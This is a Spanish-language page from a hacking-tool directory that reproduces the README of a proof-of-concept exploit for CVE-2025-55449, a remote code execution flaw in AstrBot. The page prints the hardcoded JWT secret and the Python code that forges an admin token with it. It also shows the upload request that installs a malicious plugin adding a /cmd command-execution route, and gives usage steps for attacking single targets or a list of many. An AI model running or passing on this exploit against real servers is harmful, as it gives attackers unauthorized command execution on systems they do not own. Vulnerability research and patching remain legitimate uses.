Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55449 — CVE-2025-55449 EXP | Kitploit
Herramientas/GitHubGitHub/xhh1h/cve-2025-55449
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebAutenticaciónDesarrollo de Payloads
GitHubxhh1h/cve-2025-55449

CVE-2025-55449

CVE-2025-55449 EXP

Ver Repositorio
34hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55449 - Vulnerabilidad de Ejecución Remota de Código (RCE) en AstrBot

Resumen

Este repositorio contiene un exploit de prueba de concepto para CVE-2025-55449, una vulnerabilidad crítica de Ejecución Remota de Código (RCE) en AstrBot. La vulnerabilidad permite a un atacante ejecutar código arbitrario en el sistema objetivo explotando una autenticación JWT débil y el mecanismo de instalación de plugins.

Descripción de la vulnerabilidad

La vulnerabilidad existe debido a:

  1. Clave secreta JWT codificada: AstrBot utiliza una clave secreta JWT codificada (Advanced_System_for_Text_Response_and_Bot_Operations_Tool) para la autenticación, permitiendo a los atacantes falsificar tokens de autenticación válidos.

  2. Instalación de plugins sin restricciones: El endpoint /api/plugin/install-upload permite a usuarios autenticados cargar e instalar plugins sin una validación adecuada, lo que permite la ejecución de código Python arbitrario.

  3. Ejecución de código a través del sistema de plugins: El sistema de plugins permite modificar el enrutamiento de la aplicación y ejecutar comandos arbitrarios a través de la instancia de la aplicación Flask/Quart.

Detalles técnicos

Vector de ataque

  1. Falsificación de token JWT: El exploit falsifica un token JWT utilizando la clave secreta codificada con privilegios de administrador.

  2. Ejecución de código vulnerable:La vulnerabilidad de ejecución remota de código en el backend explota la función de extensión de plugins incorporada en la aplicación, permitiendo a los usuarios cargar paquetes de plugins personalizados. El programa descomprime los paquetes, lee la información del plugin, importa el archivo Python del objeto y ejecuta el código.

Flujo del exploit

root@kitploit:~
1. Forge JWT token with hardcoded secret
2. Create malicious plugin ZIP file
3. POST to /api/plugin/install-upload with forged token
4. Plugin installs and adds /cmd endpoint
5. Execute commands via /cmd?cmd=<command>

Requisitos

  • Python 3.6+
  • Paquetes Python requeridos:
    • jwt (PyJWT)
    • requests
    • zipfile (incorporado)
    • argparse (incorporado)
    • datetime (incorporado)
    • pathlib (incorporado)

Instalación

  1. Clona este repositorio:
root@kitploit:~
git clone <repository-url>
cd CVE-2025-55449
  1. Instala las dependencias requeridas:
root@kitploit:~
pip install PyJWT requests

Uso

Objetivo único

Ejecuta el exploit contra una única URL objetivo:

root@kitploit:~
python main.py http://target-ip:port

Múltiples objetivos

Crea un archivo (ip.txt) con una URL por línea:

root@kitploit:~
http://target1:6185
http://target2:6185
http://target3:6185

Luego ejecuta:

root@kitploit:~
python main.py -r ip.txt

Ejemplo de salida

Tras una explotación exitosa, el script mostrará:

root@kitploit:~
http://target-ip:port/cmd?cmd=id

Luego puedes ejecutar comandos accediendo a:

root@kitploit:~
http://target-ip:port/cmd?cmd=<your-command>

Por ejemplo:

root@kitploit:~
http://target-ip:port/cmd?cmd=whoami
http://target-ip:port/cmd?cmd=ls -la

Estructura del proyecto

root@kitploit:~
CVE-2025-55449/
├── main.py                 # Main exploit script
├── ip.txt                  # Example target URLs file
├── README.md              # This file
└── helloworld/            # Malicious plugin directory
    ├── main.py            # Plugin code that adds /cmd endpoint
    ├── metadata.yaml      # Plugin metadata
    ├── LICENSE            # Plugin license
    └── README.md          # Plugin readme

Cómo funciona

Falsificación de token JWT

El exploit utiliza la clave secreta JWT codificada para crear un token de autenticación válido:

root@kitploit:~
key = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool"
payload = {"username": "admin", "exp": datetime.datetime.utcnow() + datetime.timedelta(days=7)}
forged = jwt.encode(payload, key, algorithm="HS256")

Plugin malicioso

El plugin (helloworld/main.py) explota el sistema de importación de Python y la instancia de la aplicación Flask/Quart para inyectar una nueva ruta:

root@kitploit:~
# The plugin finds the Quart application instance and adds a /cmd route
# that executes arbitrary commands via os.popen()

Carga del plugin

El exploit empaqueta el plugin como un archivo ZIP y lo sube a través del endpoint autenticado:

root@kitploit:~
requests.post(
    url + "/api/plugin/install-upload",
    headers={"Authorization": "Bearer " + forged},
    files={"file": (name + ".zip", zip_payload_bytes)}
)
Descargar herramienta